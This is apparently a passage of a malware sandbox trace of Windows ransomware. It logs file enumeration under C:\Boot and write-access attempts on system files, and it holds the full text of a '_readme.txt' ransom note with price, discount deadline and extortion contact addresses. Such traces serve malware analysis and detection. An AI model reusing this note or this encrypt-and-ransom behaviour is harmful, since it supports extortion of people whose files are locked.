returned 0x3b19640 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.903] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.905] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.906] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.906] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.906] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.906] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.906] PathFindFileNameW (pszPath="") returned="" [0165.906] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.906] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.907] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.907] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.907] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19640 [0165.907] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.907] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.907] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.907] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.907] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.908] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.908] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.908] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.908] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0165.908] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.908] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.908] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.908] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.909] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.909] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, 